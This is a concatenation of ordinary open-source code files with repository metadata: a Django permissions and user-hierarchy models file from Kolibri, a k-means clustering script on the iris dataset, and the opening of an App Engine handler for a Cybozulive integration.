        In general, unless an instance has already been initialized, this method should not be called directly;
        instead, it should be preferred to call ``can_create``.
        :param obj: An (unsaved) instance of a Django model, to check permissions for.
        :return: ``True`` if this user should have permission to create the object, otherwise ``False``.
        :rtype: bool
        """
        raise NotImplementedError("Subclasses of KolibriAbstractBaseUser must override the `can_create_instance` method.")

    def can_create(self, Model, data):
        """
        Checks whether this user (self) has permission to create an instance of Model with the specified attributes (data).
        This method defers to the ``can_create_instance`` method, and in most cases should not itself be overridden.
        :param Model: A subclass of ``django.db.models.Model``
        :param data: A ``dict`` of data to be used in creating an instance of the Model
        :return: ``True`` if this user should have permission to create an instance of Model with the specified data, else ``False``.
        :rtype: bool
        """
        try:
            instance = Model(**data)
            instance.clean_fields()
            instance.clean()
        except TypeError as e:
            logging.error("TypeError while validating model before checking permissions: {}".format(e.args))
            return False  # if the data provided does not fit the Model, don't continue checking
        except ValidationError as e:
            logging.error("ValidationError while validating model before checking permissions: {}".format(e.args))
            return False  # if the data does not validate, don't continue checking
        # now that we have an instance, defer to the permission-checking method that works with instances
        return self.can_create_instance(instance)

    def can_read(self, obj):
        """
        Checks whether this user (self) has permission to read a particular model instance (obj).
        This method should be overridden by classes that inherit from ``KolibriAbstractBaseUser``.
        :param obj: An instance of a Django model, to check permissions for.
        :return: ``True`` if this user should have permission to read the object, otherwise ``False``.
        :rtype: bool
        """
        raise NotImplementedError("Subclasses of KolibriAbstractBaseUser must override the `can_read` method.")

    def can_update(self, obj):
        """
        Checks whether this user (self) has permission to update a particular model instance (obj).
        This method should be overridden by classes that inherit from KolibriAbstractBaseUser.
        :param obj: An instance of a Django model, to check permissions for.
        :return: ``True`` if this user should have permission to update the object, otherwise ``False``.
        :rtype: bool
        """
        raise NotImplementedError("Subclasses of KolibriAbstractBaseUser must override the `can_update` method.")

    def can_delete(self, obj):
        """
        Checks whether this user (self) has permission to delete a particular model instance (obj).
        This method should be overridden by classes that inherit from KolibriAbstractBaseUser.
        :param obj: An instance of a Django model, to check permissions for.
        :return: ``True`` if this user should have permission to delete the object, otherwise ``False``.
        :rtype: bool
        """
        raise NotImplementedError("Subclasses of KolibriAbstractBaseUser must override the `can_delete` method.")

    def get_roles_for(self, obj):
        """
        Helper function that defers to ``get_roles_for_user`` or ``get_roles_for_collection`` based on the type of object passed in.
        """
        if isinstance(obj, KolibriAbstractBaseUser):
            return self.get_roles_for_user(obj)
        elif isinstance(obj, Collection):
            return self.get_roles_for_collection(obj)
        else:
            raise ValueError("The `obj` argument to `get_roles_for` must be either an instance of KolibriAbstractBaseUser or Collection.")

    def has_role_for(self, kinds, obj):
        """
        Helper function that defers to ``has_role_for_user`` or ``has_role_for_collection`` based on the type of object passed in.
        """
        if isinstance(obj, KolibriAbstractBaseUser):
            return self.has_role_for_user(kinds, obj)
        elif isinstance(obj, Collection):
            return self.has_role_for_collection(kinds, obj)
        else:
            raise ValueError("The `obj` argument to `has_role_for` must be either an instance of KolibriAbstractBaseUser or Collection.")

    def filter_readable(self, queryset):
        """
        Filters a queryset down to only the elements that this user should have permission to read.
        :param queryset: A ``QuerySet`` instance that the filtering should be applied to.
        :return: Filtered ``QuerySet`` including only elements that are readable by this user.
        """
        # Fixed: the error message previously named `can_delete` (copy-paste error),
        # which made a missing `filter_readable` override very confusing to debug.
        raise NotImplementedError("Subclasses of KolibriAbstractBaseUser must override the `filter_readable` method.")
class KolibriAnonymousUser(AnonymousUser, KolibriAbstractBaseUser):
    """
    Custom anonymous user that also exposes the same interface as KolibriAbstractBaseUser, for consistency.
    """

    class Meta:
        abstract = True

    def is_member_of(self, coll):
        # An anonymous user is never a member of any collection.
        return False

    def get_roles_for_user(self, user):
        # An anonymous user holds no roles.
        return set([])

    def get_roles_for_collection(self, coll):
        return set([])

    def has_role_for_user(self, kinds, user):
        return False

    def has_role_for_collection(self, kinds, coll):
        return False

    def can_create_instance(self, obj):
        # Object-level permissions may explicitly grant access to anon users;
        # without a permissions class, deny by default.
        if not _has_permissions_class(obj):
            return False
        return obj.permissions.user_can_create_object(self, obj)

    def can_read(self, obj):
        if not _has_permissions_class(obj):
            return False
        return obj.permissions.user_can_read_object(self, obj)

    def can_update(self, obj):
        if not _has_permissions_class(obj):
            return False
        return obj.permissions.user_can_update_object(self, obj)

    def can_delete(self, obj):
        if not _has_permissions_class(obj):
            return False
        return obj.permissions.user_can_delete_object(self, obj)

    def filter_readable(self, queryset):
        # Without a permissions class on the model, nothing is readable.
        if not _has_permissions_class(queryset.model):
            return queryset.none()
        return queryset.model.permissions.readable_by_user_filter(self, queryset).distinct()
@python_2_unicode_compatible
class FacilityUser(KolibriAbstractBaseUser, AbstractFacilityDataModel):
    """
    ``FacilityUser`` is the fundamental object of the auth app. These users represent the main users, and can be associated
    with a hierarchy of ``Collections`` through ``Memberships`` and ``Roles``, which then serve to help determine permissions.
    """

    permissions = (
        IsSelf() |  # FacilityUser can be read and written by itself
        IsAdminForOwnFacility() |  # FacilityUser can be read and written by a facility admin
        RoleBasedPermissions(  # FacilityUser can be read by admin or coach, and updated by admin, but not created/deleted by non-facility admin
            target_field=".",
            can_be_created_by=(),  # we can't check creation permissions by role, as user doesn't exist yet
            can_be_read_by=(role_kinds.ADMIN, role_kinds.COACH),
            can_be_updated_by=(role_kinds.ADMIN,),
            can_be_deleted_by=(),  # don't want a classroom admin deleting a user completely, just removing them from the class
        )
    )

    facility = models.ForeignKey("Facility")

    # FacilityUsers can't access the Django admin interface
    is_staff = False
    is_superuser = False

    class Meta:
        unique_together = (("username", "facility"),)

    def infer_dataset(self):
        # a user's data always belongs to the dataset of its facility
        return self.facility.dataset

    def is_member_of(self, coll):
        """Return ``True`` if this user is a member of ``coll``, directly or via the collection hierarchy."""
        # membership never crosses dataset (facility) boundaries
        if self.dataset_id != coll.dataset_id:
            return False
        if coll.kind == collection_kinds.FACILITY:
            return True  # FacilityUser is always a member of her own facility
        return HierarchyRelationsFilter(FacilityUser.objects.all()).filter_by_hierarchy(
            target_user=F("id"),
            ancestor_collection=coll.id,
        ).filter(id=self.id).exists()

    def get_roles_for_user(self, user):
        """Return the set of role kinds this user holds with respect to the target ``user``."""
        # roles never cross dataset boundaries; non-facility users have no dataset_id
        if not hasattr(user, "dataset_id") or self.dataset_id != user.dataset_id:
            return set([])
        role_instances = HierarchyRelationsFilter(Role).filter_by_hierarchy(
            ancestor_collection=F("collection"),
            source_user=F("user"),
            target_user=user,
        ).filter(user=self)
        return set([instance["kind"] for instance in role_instances.values("kind").distinct()])

    def get_roles_for_collection(self, coll):
        """Return the set of role kinds this user holds with respect to the collection ``coll``."""
        if self.dataset_id != coll.dataset_id:
            return set([])
        role_instances = HierarchyRelationsFilter(Role).filter_by_hierarchy(
            ancestor_collection=F("collection"),
            source_user=F("user"),
            descendant_collection=coll,
        ).filter(user=self)
        return set([instance["kind"] for instance in role_instances.values("kind").distinct()])

    def has_role_for_user(self, kinds, user):
        """Return ``True`` if this user has any of the role ``kinds`` for the target ``user``."""
        if not kinds:
            return False
        if not hasattr(user, "dataset_id") or self.dataset_id != user.dataset_id:
            return False
        return HierarchyRelationsFilter(Role).filter_by_hierarchy(
            ancestor_collection=F("collection"),
            source_user=F("user"),
            role_kind=kinds,
            target_user=user,
        ).filter(user=self).exists()

    def has_role_for_collection(self, kinds, coll):
        """Return ``True`` if this user has any of the role ``kinds`` for the collection ``coll``."""
        if not kinds:
            return False
        if self.dataset_id != coll.dataset_id:
            return False
        return HierarchyRelationsFilter(Role).filter_by_hierarchy(
            ancestor_collection=F("collection"),
            source_user=F("user"),
            role_kind=kinds,
            descendant_collection=coll,
        ).filter(user=self).exists()

    def can_create_instance(self, obj):
        # a FacilityUser's permissions are determined through the object's permission class
        if _has_permissions_class(obj):
            return obj.permissions.user_can_create_object(self, obj)
        else:
            return False

    def can_read(self, obj):
        # a FacilityUser's permissions are determined through the object's permission class
        if _has_permissions_class(obj):
            return obj.permissions.user_can_read_object(self, obj)
        else:
            return False

    def can_update(self, obj):
        # a FacilityUser's permissions are determined through the object's permission class
        if _has_permissions_class(obj):
            return obj.permissions.user_can_update_object(self, obj)
        else:
            return False

    def can_delete(self, obj):
        # a FacilityUser's permissions are determined through the object's permission class
        if _has_permissions_class(obj):
            return obj.permissions.user_can_delete_object(self, obj)
        else:
            return False

    def filter_readable(self, queryset):
        # delegate filtering to the model's permissions class, if it has one
        if _has_permissions_class(queryset.model):
            return queryset.model.permissions.readable_by_user_filter(self, queryset).distinct()
        else:
            return queryset.none()

    def __str__(self):
        return '"{user}"@"{facility}"'.format(user=self.full_name or self.username, facility=self.facility)
class DeviceOwnerManager(models.Manager):
    """Model manager for ``DeviceOwner``, providing the superuser factory Django expects."""

    def create_superuser(self, username, password, **extra_fields):
        """
        Create, save and return a new ``DeviceOwner`` with the given credentials.

        :param username: The username for the new superuser; must be non-empty.
        :param password: The raw password; it is hashed via ``set_password`` before saving.
        :param extra_fields: Additional model field values (e.g. ``full_name``).
        :return: The newly created ``DeviceOwner`` instance.
        :raises ValueError: If no username is provided.
        """
        if not username:
            raise ValueError('The given username must be set')
        # Bug fix: **extra_fields was previously accepted but silently dropped;
        # pass it through so callers (e.g. `createsuperuser`) can set extra fields.
        user = DeviceOwner(username=username, **extra_fields)
        user.set_password(password)
        user.save()
        return user
@python_2_unicode_compatible
class DeviceOwner(KolibriAbstractBaseUser):
    """
    A ``DeviceOwner`` is the special, device-local superuser created when Kolibri is first installed.
    It is not tied to any ``Facility``, and is required for device-wide operations (creating a
    ``Facility``, changing configuration settings, upgrading Kolibri, controlling syncing, etc.).
    A ``DeviceOwner`` has unrestricted access to all data on the device.
    """

    permissions = AnybodyCanCreateIfNoDeviceOwner()

    objects = DeviceOwnerManager()

    # DeviceOwners can access the Django admin interface
    is_staff = True
    is_superuser = True

    def is_member_of(self, coll):
        # device owners sit entirely outside the collection hierarchy
        return False

    def get_roles_for_user(self, user):
        # a device owner acts as admin for every user on the device
        return set([role_kinds.ADMIN])

    def get_roles_for_collection(self, coll):
        # a device owner acts as admin for every collection on the device
        return set([role_kinds.ADMIN])

    def has_role_for_user(self, kinds, user):
        # a device owner holds (only) the admin role, for all users on the device
        kinds = [kinds] if isinstance(kinds, string_types) else kinds
        return role_kinds.ADMIN in kinds

    def has_role_for_collection(self, kinds, coll):
        # a device owner holds (only) the admin role, for all collections on the device
        kinds = [kinds] if isinstance(kinds, string_types) else kinds
        return role_kinds.ADMIN in kinds

    # As superusers, DeviceOwners are allowed every operation on every object.

    def can_create_instance(self, obj):
        return True

    def can_read(self, obj):
        return True

    def can_update(self, obj):
        return True

    def can_delete(self, obj):
        return True

    def filter_readable(self, queryset):
        # everything is readable; return the queryset untouched
        return queryset

    def __str__(self):
        return self.full_name or self.username

    # The three methods below guarantee full access to the Django admin.

    def has_perm(self, perm, obj=None):
        return True

    def has_perms(self, perm_list, obj=None):
        return True

    def has_module_perms(self, app_label):
        return True
@python_2_unicode_compatible
class Collection(MPTTModel, AbstractFacilityDataModel):
    """
    ``Collections`` are hierarchical groups of ``FacilityUsers``, used for grouping users and making decisions about permissions.
    ``FacilityUsers`` can have roles for one or more ``Collections``, by way of obtaining ``Roles`` associated with those ``Collections``.
    ``Collections`` can belong to other ``Collections``, and user membership in a ``Collection`` is conferred through ``Memberships``.
    ``Collections`` are subdivided into several pre-defined levels.
    """

    # Collection can be read by anybody from the facility; writing is only allowed by an admin for the collection.
    # Furthermore, no FacilityUser can create or delete a Facility. Permission to create a collection is governed
    # by roles in relation to the new collection's parent collection (see CollectionSpecificRoleBasedPermissions).
    permissions = (
        IsFromSameFacility(read_only=True) |
        CollectionSpecificRoleBasedPermissions() |
        AnybodyCanCreateIfNoFacility() |
        AnonUserCanReadFacilitiesThatAllowSignUps()
    )

    _KIND = None  # Should be overridden in subclasses to specify what "kind" they are

    name = models.CharField(max_length=100)
    parent = TreeForeignKey('self', null=True, blank=True, related_name='children', db_index=True)
    kind = models.CharField(max_length=20, choices=collection_kinds.choices)

    def clean_fields(self, *args, **kwargs):
        # make sure the subclass's fixed "kind" is in place before validation runs
        self._ensure_kind()
        super(Collection, self).clean_fields(*args, **kwargs)

    def save(self, *args, **kwargs):
        # make sure the subclass's fixed "kind" is in place before persisting
        self._ensure_kind()
        super(Collection, self).save(*args, **kwargs)

    def _ensure_kind(self):
        """
        Make sure the "kind" is set correctly on the model, corresponding to the appropriate subclass of ``Collection``.
        """
        if self._KIND:
            self.kind = self._KIND

    def get_members(self):
        """Return a queryset of the ``FacilityUsers`` who are members of this collection (directly or via the hierarchy)."""
        if self.kind == collection_kinds.FACILITY:
            return FacilityUser.objects.filter(dataset=self.dataset)  # FacilityUser is always a member of her own facility
        return HierarchyRelationsFilter(FacilityUser).filter_by_hierarchy(
            target_user=F("id"),
            ancestor_collection=self,
        )

    def add_role(self, user, role_kind):
        """
        Create a ``Role`` associating the provided user with this collection, with the specified kind of role.
        If the Role object already exists, just return that, without changing anything.
        :param user: The ``FacilityUser`` to associate with this ``Collection``.
        :param role_kind: The kind of role to give the user with respect to this ``Collection``.
        :return: The ``Role`` object (possibly new) that associates the user with the ``Collection``.
        :raises InvalidRoleKind: If ``role_kind`` is not one of the defined role kinds.
        :raises UserIsNotFacilityUser: If ``user`` is not a ``FacilityUser``.
        """
        # ensure the specified role kind is valid
        if role_kind not in (kind[0] for kind in role_kinds.choices):
            raise InvalidRoleKind("'{role_kind}' is not a valid role kind.".format(role_kind=role_kind))
        # ensure the provided user is a FacilityUser
        if not isinstance(user, FacilityUser):
            raise UserIsNotFacilityUser("You can only add roles for FacilityUsers.")
        # create the necessary role, if it doesn't already exist
        role, created = Role.objects.get_or_create(user=user, collection=self, kind=role_kind)
        return role

    def remove_role(self, user, role_kind):
        """
        Remove any ``Role`` objects associating the provided user with this ``Collection``, with the specified kind of role.
        :param user: The ``FacilityUser`` to dissociate from this ``Collection`` (for the specific role kind).
        :param role_kind: The kind of role to remove from the user with respect to this ``Collection``.
        :raises InvalidRoleKind: If ``role_kind`` is not one of the defined role kinds.
        :raises UserIsNotFacilityUser: If ``user`` is not a ``FacilityUser``.
        :raises UserDoesNotHaveRoleError: If the user does not have the role at all.
        :raises UserHasRoleOnlyIndirectlyThroughHierarchyError: If the role is only inherited via the hierarchy.
        """
        # ensure the specified role kind is valid
        if role_kind not in (kind[0] for kind in role_kinds.choices):
            raise InvalidRoleKind("'{role_kind}' is not a valid role kind.".format(role_kind=role_kind))
        # ensure the provided user is a FacilityUser
        if not isinstance(user, FacilityUser):
            raise UserIsNotFacilityUser("You can only remove roles for FacilityUsers.")
        # make sure the user has the role to begin with
        if not user.has_role_for_collection(role_kind, self):
            raise UserDoesNotHaveRoleError("User does not have this role for this collection.")
        # delete the appropriate role, if it exists
        results = Role.objects.filter(user=user, collection=self, kind=role_kind).delete()
        # if no Roles were deleted, the user's role must have been indirect (via the collection hierarchy)
        if results[0] == 0:
            raise UserHasRoleOnlyIndirectlyThroughHierarchyError(
                "Role cannot be removed, as user has it only indirectly, through the collection hierarchy.")

    def add_member(self, user):
        """
        Create a ``Membership`` associating the provided user with this ``Collection``.
        If the ``Membership`` object already exists, just return that, without changing anything.
        :param user: The ``FacilityUser`` to add to this ``Collection``.
        :return: The ``Membership`` object (possibly new) that associates the user with the ``Collection``.
        :raises UserIsNotFacilityUser: If ``user`` is not a ``FacilityUser``.
        """
        # ensure the provided user is a FacilityUser
        if not isinstance(user, FacilityUser):
            raise UserIsNotFacilityUser("You can only add memberships for FacilityUsers.")
        # create the necessary membership, if it doesn't already exist
        membership, created = Membership.objects.get_or_create(user=user, collection=self)
        return membership

    def remove_member(self, user):
        """
        Remove any ``Membership`` objects associating the provided user with this ``Collection``.
        :param user: The ``FacilityUser`` to remove from this ``Collection``.
        :return: ``True`` if a ``Membership`` was removed, ``False`` if there was no matching ``Membership`` to remove.
        :raises UserIsNotFacilityUser: If ``user`` is not a ``FacilityUser``.
        :raises UserIsNotMemberError: If the user is not a member of the collection at all.
        :raises UserIsMemberOnlyIndirectlyThroughHierarchyError: If the membership is only inherited via the hierarchy.
        """
        # ensure the provided user is a FacilityUser
        if not isinstance(user, FacilityUser):
            raise UserIsNotFacilityUser("You can only remove memberships for FacilityUsers.")
        if not user.is_member_of(self):
            raise UserIsNotMemberError("The user is not a member of the collection, and cannot be removed.")
        # delete the appropriate membership, if it exists
        results = Membership.objects.filter(user=user, collection=self).delete()
        # if no Memberships were deleted, the user's membership must have been indirect (via the collection hierarchy)
        if results[0] == 0:
            raise UserIsMemberOnlyIndirectlyThroughHierarchyError(
                "Membership cannot be removed, as user is a member only indirectly, through the collection hierarchy.")

    def infer_dataset(self):
        if self.parent:
            # subcollections inherit dataset from root of their tree
            # (we can't call `get_root` directly on self, as it won't work if self hasn't yet been saved)
            return self.parent.get_root().dataset
        else:
            return None  # the root node (i.e. Facility) must be explicitly tied to a dataset

    def __str__(self):
        return '"{name}" ({kind})'.format(name=self.name, kind=self.kind)
@python_2_unicode_compatible
class Membership(AbstractFacilityDataModel):
    """
    A ``FacilityUser`` can be marked as a member of a ``Collection`` through a ``Membership`` object. Being a member of a
    ``Collection`` also means being a member of all the ``Collections`` above that ``Collection`` in the tree (i.e. if you
    are a member of a ``LearnerGroup``, you are also a member of the ``Classroom`` that contains that ``LearnerGroup``,
    and of the ``Facility`` that contains that ``Classroom``).
    """

    permissions = (
        IsOwn(read_only=True) |  # users can read their own Memberships
        RoleBasedPermissions(  # Memberships can be read and written by admins, and read by coaches, for the member user
            target_field="user",
            can_be_created_by=(role_kinds.ADMIN,),
            can_be_read_by=(role_kinds.ADMIN, role_kinds.COACH),
            can_be_updated_by=(),  # Membership objects shouldn't be updated; they should be deleted and recreated as needed
            can_be_deleted_by=(role_kinds.ADMIN,),
        )
    )

    user = models.ForeignKey('FacilityUser', blank=False, null=False)

    # Note: "It's recommended you use mptt.fields.TreeForeignKey wherever you have a foreign key to an MPTT model."
    # https://django-mptt.github.io/django-mptt/models.html#treeforeignkey-treeonetoonefield-treemanytomanyfield
    collection = TreeForeignKey("Collection")

    class Meta:
        unique_together = (("user", "collection"),)

    def infer_dataset(self):
        """Derive the dataset from the user and collection, which must agree.

        :raises KolibriValidationError: If the user and collection belong to different datasets.
        """
        user_dataset = self.user.dataset
        collection_dataset = self.collection.dataset
        if user_dataset != collection_dataset:
            raise KolibriValidationError("Collection and user for a Membership object must be in same dataset.")
        return user_dataset

    def __str__(self):
        return "{user}'s membership in {collection}".format(user=self.user, collection=self.collection)
@python_2_unicode_compatible
class Role(AbstractFacilityDataModel):
    """
    A ``FacilityUser`` can have a role for a particular ``Collection`` through a ``Role`` object, which also stores
    the "kind" of the ``Role`` (currently, one of "admin" or "coach"). Having a role for a ``Collection`` also
    implies having that role for all sub-collections of that ``Collection`` (i.e. all the ``Collections`` below it
    in the tree).
    """

    permissions = (
        IsOwn(read_only=True) |  # users can read their own Roles
        RoleBasedPermissions(  # Roles can be read and written by admins, and read by coaches, for the role's collection
            target_field="collection",
            can_be_created_by=(role_kinds.ADMIN,),
            can_be_read_by=(role_kinds.ADMIN, role_kinds.COACH),
            can_be_updated_by=(),  # Role objects shouldn't be updated; they should be deleted and recreated as needed
            can_be_deleted_by=(role_kinds.ADMIN,),
        )
    )

    user = models.ForeignKey('FacilityUser', related_name="roles", blank=False, null=False)

    # Note: "It's recommended you use mptt.fields.TreeForeignKey wherever you have a foreign key to an MPTT model."
    # https://django-mptt.github.io/django-mptt/models.html#treeforeignkey-treeonetoonefield-treemanytomanyfield
    collection = TreeForeignKey("Collection")

    kind = models.CharField(max_length=20, choices=role_kinds.choices)

    class Meta:
        unique_together = (("user", "collection", "kind"),)

    def infer_dataset(self):
        """Derive the dataset from the user and collection, which must agree.

        :raises KolibriValidationError: If the user and collection belong to different datasets.
        """
        user_dataset = self.user.dataset
        collection_dataset = self.collection.dataset
        if user_dataset != collection_dataset:
            raise KolibriValidationError("The collection and user for a Role object must be in the same dataset.")
        return user_dataset

    def __str__(self):
        return "{user}'s {kind} role for {collection}".format(user=self.user, kind=self.kind, collection=self.collection)
class CollectionProxyManager(models.Manager):
    """Manager for ``Collection`` proxy models that narrows querysets to the subclass's kind."""

    def get_queryset(self):
        # restrict results to the proxy subclass's collection kind (e.g. facility, classroom)
        base_qs = super(CollectionProxyManager, self).get_queryset()
        return base_qs.filter(kind=self.model._KIND)
@python_2_unicode_compatible
class Facility(Collection):
    """Proxy of ``Collection`` restricted to the top-level "facility" kind."""

    _KIND = collection_kinds.FACILITY

    objects = CollectionProxyManager()

    class Meta:
        proxy = True

    @classmethod
    def get_default_facility(cls):
        """Return the default ``Facility`` for this device, or ``None`` if none exists."""
        # temporary approach to a default facility; later, we can make this more refined
        return cls.objects.all().first()

    def save(self, *args, **kwargs):
        """Save the facility, enforcing that it is always the root of its collection tree.

        :raises IntegrityError: If a parent collection has been assigned.
        """
        if self.parent:
            raise IntegrityError("Facility must be the root of a collection tree, and cannot have a parent.")
        super(Facility, self).save(*args, **kwargs)

    def infer_dataset(self):
        # if we don't yet have a dataset, create a new one for this facility
        # (note the side effect: a FacilityDataset row is created on first call)
        if not self.dataset_id:
            self.dataset = FacilityDataset.objects.create()
        return self.dataset

    def get_classrooms(self):
        """
        Returns a QuerySet of Classrooms under this Facility.
        :return: A Classroom QuerySet.
        """
        return Classroom.objects.filter(parent=self)

    # Convenience wrappers around add_role/remove_role for the two role kinds.

    def add_admin(self, user):
        return self.add_role(user, role_kinds.ADMIN)

    def add_admins(self, users):
        return [self.add_admin(user) for user in users]

    def remove_admin(self, user):
        self.remove_role(user, role_kinds.ADMIN)

    def add_coach(self, user):
        return self.add_role(user, role_kinds.COACH)

    def add_coaches(self, users):
        return [self.add_coach(user) for user in users]

    def remove_coach(self, user):
        self.remove_role(user, role_kinds.COACH)

    def __str__(self):
        return self.name
@python_2_unicode_compatible
class Classroom(Collection):
    """Proxy of ``Collection`` restricted to the "classroom" kind."""

    _KIND = collection_kinds.CLASSROOM

    objects = CollectionProxyManager()

    class Meta:
        proxy = True

    def save(self, *args, **kwargs):
        """Save the classroom, enforcing that it is never the root of a collection tree."""
        if not self.parent:
            raise IntegrityError("Classroom cannot be the root of a collection tree, and must have a parent.")
        super(Classroom, self).save(*args, **kwargs)

    def get_facility(self):
        """
        Look up this ``Classroom``'s parent ``Facility``.
        :return: A ``Facility`` instance.
        """
        return Facility.objects.get(id=self.parent_id)

    def get_learner_groups(self):
        """
        Look up the ``LearnerGroups`` whose parent is this ``Classroom``.
        :return: A ``LearnerGroup`` ``QuerySet``.
        """
        return LearnerGroup.objects.filter(parent=self)

    # Convenience wrappers around add_role/remove_role for the two role kinds.

    def add_admin(self, user):
        return self.add_role(user, role_kinds.ADMIN)

    def add_admins(self, users):
        return [self.add_role(user, role_kinds.ADMIN) for user in users]

    def remove_admin(self, user):
        self.remove_role(user, role_kinds.ADMIN)

    def add_coach(self, user):
        return self.add_role(user, role_kinds.COACH)

    def add_coaches(self, users):
        return [self.add_role(user, role_kinds.COACH) for user in users]

    def remove_coach(self, user):
        self.remove_role(user, role_kinds.COACH)

    def __str__(self):
        return self.name
@python_2_unicode_compatible
class LearnerGroup(Collection):
    """Proxy of ``Collection`` restricted to the "learnergroup" kind."""

    _KIND = collection_kinds.LEARNERGROUP

    objects = CollectionProxyManager()

    class Meta:
        proxy = True

    def save(self, *args, **kwargs):
        """Save the learner group, enforcing that it is never the root of a collection tree."""
        if not self.parent:
            raise IntegrityError("LearnerGroup cannot be the root of a collection tree, and must have a parent.")
        super(LearnerGroup, self).save(*args, **kwargs)

    def get_classroom(self):
        """
        Look up this ``LearnerGroup``'s parent ``Classroom``.
        :return: A ``Classroom`` instance.
        """
        return Classroom.objects.get(id=self.parent_id)

    # Learners are simply members of the group; delegate to the membership API.

    def add_learner(self, user):
        return self.add_member(user)

    def add_learners(self, users):
        return [self.add_member(user) for user in users]

    def remove_learner(self, user):
        return self.remove_member(user)

    def __str__(self):
        return self.name
| {
"content_hash": "f5f78ba31e5be31579193fb046e415d8",
"timestamp": "",
"source": "github",
"line_count": 979,
"max_line_length": 144,
"avg_line_length": 42.97037793667007,
"alnum_prop": 0.6726490444042978,
"repo_name": "aronasorman/kolibri",
"id": "d4d04dde8cbbe3d7106a947c6b4b9fdbfe30f735",
"size": "42068",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "kolibri/auth/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "26247"
},
{
"name": "HTML",
"bytes": "4007"
},
{
"name": "JavaScript",
"bytes": "330241"
},
{
"name": "Makefile",
"bytes": "3887"
},
{
"name": "Python",
"bytes": "569360"
},
{
"name": "Shell",
"bytes": "7127"
},
{
"name": "Vue",
"bytes": "222681"
}
],
"symlink_target": ""
} |
import sys
import numpy as np
import operator
import random
from scipy.spatial import distance
from sklearn.cross_validation import train_test_split
from sklearn.datasets import load_iris
def normalise(dataset):
    """Linearly rescale each column of ``dataset`` onto the interval [0, 1]."""
    col_min = np.min(dataset, axis=0)
    col_max = np.max(dataset, axis=0)
    return (dataset - col_min) / (col_max - col_min)
def random_group_assignment(points, k):
    """Assign each of ``points`` items a uniformly random cluster label.

    :param points: Number of data points to label.
    :param k: Number of clusters.
    :return: Integer array of length ``points`` with values in ``[0, k)``.
    """
    # np.random.random_integers(0, k - 1, points) was deprecated long ago and has
    # been removed from recent NumPy releases; randint's half-open range [0, k)
    # draws from exactly the same set of labels.
    return np.random.randint(0, k, points)
def mean_centre(points):
    """Return the centroid of ``points``: the element-wise mean over axis 0."""
    centre = np.mean(points, axis=0)
    return centre
def dist(a, b):
    """Euclidean distance between two points ``a`` and ``b``."""
    euclidean_distance = distance.euclidean(a, b)
    return euclidean_distance
def closest_centrepoint(point, centres):
    """Return the index of the centre nearest to ``point`` (Euclidean distance)."""
    # min() returns the first minimal element, matching the stable-sort tie
    # behaviour of the sorted()-based original: lowest-numbered centre wins.
    distances = [dist(centre, point) for centre in centres]
    return min(range(len(distances)), key=distances.__getitem__)
def most_similar(xs, ys):
    """Find the pair of sets (one from ``xs``, one from ``ys``) with the fewest mismatches.

    The mismatch count for a pair is the size of their symmetric difference.

    :param xs: Iterable of sets.
    :param ys: Iterable of sets.
    :return: Tuple ``(x, y, mismatch)`` for the best pair (first such pair on ties).
    :raises ValueError: If either input is empty, so no pair exists.
    """
    min_pair = None
    min_mismatch = float('inf')  # sys.maxint does not exist on Python 3
    for x in xs:
        for y in ys:
            mismatch = len(x - y) + len(y - x)
            if mismatch < min_mismatch:
                min_mismatch = mismatch
                min_pair = (x, y, mismatch)
    if min_pair is None:
        # previously this fell through to an UnboundLocalError; fail explicitly
        raise ValueError("most_similar() requires non-empty collections of sets")
    return min_pair
def accuracy(expected, result):
    """Count assignment mismatches between two clusterings of the same points.

    Groups each labelling into sets of point indices, then greedily pairs the
    most-similar groups and sums their symmetric-difference sizes.

    :param expected: Sequence of ground-truth labels, one per point.
    :param result: Sequence of predicted labels, one per point.
    :return: Total number of mismatched point assignments (0 means identical grouping).
    """
    expected_ag = {}
    result_ag = {}
    for n, e in enumerate(expected):
        expected_ag.setdefault(e, set()).add(n)
    for n, r in enumerate(result):
        result_ag.setdefault(r, set()).add(n)
    # list() is required on Python 3, where dict.values() is a view object
    # that supports neither .remove() nor truth-driven mutation loops.
    expected_sets = list(expected_ag.values())
    result_sets = list(result_ag.values())
    mismatches = 0
    while expected_sets:
        # pair off the closest remaining groups and accumulate their mismatch
        e, r, m = most_similar(expected_sets, result_sets)
        mismatches += m
        expected_sets.remove(e)
        result_sets.remove(r)
    return mismatches
def main():
K = len(load_iris()['target_names'])
y = load_iris()['target']
X = load_iris()['data']
X = normalise(X)
assignment = random_group_assignment(len(X), K)
for attempt in range(20):
centres = [mean_centre(X[assignment == k]) for k in range(K)]
new_assignment = np.apply_along_axis(closest_centrepoint, 1, X, centres)
corrections = sum(assignment != new_assignment)
print 'Corrections:', corrections
if corrections == 0:
print 'Optimal clusters identified'
break
assignment = new_assignment
print 'Mismatches:', accuracy(y, assignment)
if __name__ == '__main__':
main()
| {
"content_hash": "d8e082b5c741b917abd60f0f87636a9f",
"timestamp": "",
"source": "github",
"line_count": 89,
"max_line_length": 80,
"avg_line_length": 25.382022471910112,
"alnum_prop": 0.621071270473661,
"repo_name": "noelevans/sandpit",
"id": "31c9eea01f249511ea880fca1bd98f20a23d1539",
"size": "2259",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "k_means_clustering.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "7565"
},
{
"name": "HTML",
"bytes": "4003856"
},
{
"name": "Julia",
"bytes": "2285"
},
{
"name": "Jupyter Notebook",
"bytes": "257479"
},
{
"name": "OpenEdge ABL",
"bytes": "1071"
},
{
"name": "Perl",
"bytes": "1003"
},
{
"name": "Python",
"bytes": "383797"
},
{
"name": "R",
"bytes": "16913"
},
{
"name": "Shell",
"bytes": "11957"
},
{
"name": "TypeScript",
"bytes": "112"
},
{
"name": "Vim script",
"bytes": "5639"
}
],
"symlink_target": ""
} |
import os
import urllib
import logging
import datetime
import re
from lib import feedparser
from xml.sax import saxutils
from google.appengine.ext import webapp
from controller.utils import template
from google.appengine.ext.webapp import util
from google.appengine.ext import db
from django.utils import simplejson
from controller import oauth,utils,model
from controller.utils import BaseHandler,need_login
class CybozuliveHandler(BaseHandler):
    """Web handler for the Cybozulive integration: column setup, account listing,
    message-feed retrieval, and posting of new messages/comments."""

    @need_login
    def get(self, action="", account="", param=""):
        """Dispatch GET requests by ``action``.

        Supported actions: ``add_column`` and ``accounts`` render HTML templates;
        ``messages`` returns a JSON feed whose source URL depends on the ``type``
        query parameter. Any other action yields a 400 response.
        """
